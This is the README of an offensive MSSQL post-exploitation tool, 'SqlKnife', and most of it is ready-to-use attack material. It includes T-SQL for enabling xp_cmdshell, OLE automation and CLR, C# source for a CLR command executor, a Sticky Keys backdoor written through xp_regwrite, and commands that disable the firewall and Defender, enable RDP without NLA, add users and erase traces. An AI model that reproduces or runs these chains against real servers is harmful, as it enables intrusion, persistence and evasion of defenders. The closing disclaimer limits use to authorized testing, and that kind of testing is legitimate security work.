MSSQL-Based System Management
A fully featured command line tool for post-exploitation operations on Microsoft SQL Server instances. Provides RCE (Remote Code Execution), privilege escalation, persistence, evasion, and cleanup capabilities via T-SQL injection or authenticated access.
Designed for red team members, pentesters, and offensive security researchers who want to move from SQL injection to the SYSTEM shell with a single command.
- Remote Code Execution via multiple vectors:
xp_cmdshellsp_OACreate(OLE Automation)- Custom CLR Assemblies (
SqlCmdExec,DownLoadExec,PotatoInSQL,EfsPotatoCmd)
- Privilege Escalation & Environment Prep:
- Enable advanced procedures
- Enable CLR integration
- Set
TRUSTWORTHY ON
- Defense Evasion:
- Disable Windows Firewall (Domain/Public/Private profiles)
- Disable Windows Defender via registry
- Persistence:
- Sticky Keys hijack (
sethc.exe→cmd.exe)
- Sticky Keys hijack (
- Lateral Movement Prep:
- Enable RDP and disable Network Level Authentication (NLA)
- Cleanup & Reversal:
- Drop malicious procedures/assemblies
- Disable CLR/xp_cmdshell post-operation
- Supports .NET 3.5 and .NET 4.x CLR payloads
- Full CLI interface with long/short options
# Basic RCE via xp_cmdshell
SqlKnife -H 192.168.1.10 -u sa -p 'P@ssw0rd!' -c "whoami" --xpcmd
# Enable RDP + Sticky Keys backdoor
SqlKnife -H 192.168.1.10 -u sa -p 'P@ssw0rd!' --openrdp --shift
# Deploy CLR-based command executor (.NET 4)
SqlKnife -H 192.168.1.10 -u sa -p 'P@ssw0rd!' --clrcmd --4 --fix
SqlKnife -H 192.168.1.10 -u sa -p 'P@ssw0rd!' -c "net user hack P@ss123 /add" --clrcmd
# Remove all traces
SqlKnife -H 192.168.1.10 -u sa -p 'P@ssw0rd!' --clrcmd --removeIt is a standalone C++ executable file (it only works on Windows due to Windows-specific T-SQL loads).
-
Prerequisites
-
Visual Studio 2022
-
Windows SDK
-
Desktop development with C++
-
Data storage and processing
-
-
Download the project to your computer.
-
Extract the Project to a Folder.
-
Open the solution file (.sln).
-
Select Build Solution from the Build menu.
Note: The tool relies on the Windows registry and ODBC, so it only works on Windows hosts (attacker or proxy).
-- xp_cmdshell (if enabled)
EXEC xp_cmdshell ‘whoami’;
-- OLE Automation (if enabled)
DECLARE @shell INT;
EXEC sp_oacreate ‘wscript.shell’, @shell OUT;
EXEC sp_oamethod @shell, ‘run’, null, ‘cmd /c whoami’;To use advanced features, you often need to enable backend components:
-- Step 1: Enable advanced options
EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE;
-- Step 2: Enable xp_cmdshell or OLE
EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;
-- OR
EXEC sp_configure ‘Ole Automation Procedures’, 1; RECONFIGURE;
-- Step 3: For CLR attacks
EXEC sp_configure ‘clr enabled’, 1; RECONFIGURE;
ALTER DATABASE master SET TRUSTWORTHY ON;Automates this chain with
--fix.
DBUP and DBUP2 refer to custom CLR assemblies (PotatoInSQL and EfsPotatoCmd) that leverage:
- Named pipe impersonation (like
JuicyPotato) - EFSRPC abuse (like
EfsPotato) - .NET unsafe code execution
- Enable CLR & TRUSTWORTHY
- Upload base64-encoded or hex-encoded malicious DLL via
CREATE ASSEMBLY - Bind to T-SQL stored procedure
- Execute with high privileges (often NT AUTHORITY\SYSTEM)
These bypass common AMSI/EDR because execution happens inside SQL Server process.
Inside your compiled .dll (C#):
using Microsoft.SqlServer.Server;
using System;
using System.Data;
using System.Diagnostics;
using System.Text;
public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void SqlCmdExec(String cmd)
{
//public static void SqlCmdExec(string filename, string cmd)
{
//if (!string.IsNullOrEmpty(cmd)&&!string.IsNullOrEmpty(filename))
if (!string.IsNullOrEmpty(cmd))
{
//SqlContext.Pipe.Send(RunCommand("cmd.exe", "/c " + cmd));
//RunCommand("cmd.exe","/c "+cmd);
string cmdres = RunCommand("sqlps.exe", cmd);
SqlDataRecord rec = new SqlDataRecord(new SqlMetaData[] {
new SqlMetaData("output",SqlDbType.Text,-1)
});
SqlContext.Pipe.SendResultsStart(rec);
rec.SetSqlString(0, cmdres);
SqlContext.Pipe.SendResultsRow(rec);
SqlContext.Pipe.SendResultsEnd();
}
}
}
public static string RunCommand(string filename, string arguments)
{
var process = new Process();
process.StartInfo.FileName = filename;
if (!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments = arguments;
}
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
var stdOutput = new StringBuilder();
process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
string stdError = null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError = process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
if (process.ExitCode == 0)
{
//SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
var message = new StringBuilder();
if (!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}
if (stdOutput.Length != 0)
{
message.AppendLine("Std output:");
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
}
return stdOutput.ToString();
}
}Compiled with:
csc /target:library /unsafe SqlCmdExec.csThen converted to hex/base64 for injection via CREATE ASSEMBLY.
SqlKnife handles the T-SQL wrapper—you just provide the payload (in future versions, embedded).
Hijack sethc.exe (Shift key) to spawn cmd.exe at login screen:
EXEC xp_regwrite
'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'debugger',
'REG_SZ',
'c:\windows\system32\cmd.exe';Physical or RDP access required, but no authentication needed once triggered.
| Vector | Command | Works When... |
|---|---|---|
xp_cmdshell |
EXEC xp_cmdshell 'ipconfig' |
Enabled & sysadmin |
sp_OACreate |
sp_oacreate 'wscript.shell',... |
OLE enabled |
| CLR Assembly | EXEC SqlCmdExec 'net user' |
CLR enabled + TRUSTWORTHY |
xp_regwrite |
Disable firewall/enable RDP | Registry write access |
- Firewall Bypass: Disable all firewall profiles via registry
- Defender Disable: Set
DisableAntiSpyware=1inHKLM\...\Windows Defender - AV Evasion: CLR code runs in
sqlservr.exe—often not monitored - No File Drop: All payloads executed in-memory or via SQL injection
SqlKnife v1.0
A mssql exploit tool in commandline.
SqlKnife.exe <-H host> <-P port> <-u username> <-p password> <-D dbname> <-c cmd>
<--openrdp> <--shift> <--disfw>
<--xpcmd> <--oacreate> <--clrcmd> <--clrdexec> <--dbup> <--dbup2>
<--fix> <--remove> <--3/--4>
| Short | Long | Description |
|---|---|---|
-H |
— | SQL Server IP (default: 127.0.0.1) |
-P |
— | Port (default: 1433) |
-u |
— | Username (default: sa) |
-p |
— | Password |
-D |
— | Database (default: master) |
-c |
— | Command to execute |
| — | --openrdp |
Enable RDP (port 3389) |
| — | --shift |
Install Sticky Keys backdoor |
| — | --disfw |
Disable Windows Firewall + Defender |
| — | --xpcmd |
Use xp_cmdshell for RCE |
| — | --oacreate |
Use OLE Automation (sp_OACreate) |
| — | --clrcmd |
Use SqlCmdExec CLR procedure |
| — | --clrdexec |
Use DownLoadExec (download & exec) |
| — | --dbup |
Deploy PotatoInSQL (JuicyPotato-like) |
| — | --dbup2 |
Deploy EfsPotatoCmd (EfsPotato) |
| — | --fix |
Enable required SQL features for selected method |
| — | --remove |
Clean up procedures/assemblies |
| — | --3 / --4 |
Target .NET 3.5 or .NET 4.x CLR |
Always remove traces after exploitation:
# Remove CLR-based backdoor
SqlKnife -H 192.168.1.10 -u sa -p 'P@ssw0rd!' --clrcmd --remove
# Disable xp_cmdshell
SqlKnife -H 192.168.1.10 -u sa -p 'P@ssw0rd!' --xpcmd --removeNever leave CLR assemblies or procedures behind—they are noisy and persistent.
This tool is for authorized penetration testing and educational purposes only.
The author disclaims all liability for misuse. Use responsibly and only on systems you own or have explicit permission to test.
This project is licensed under the MIT License. For more information, see the LICENSE file.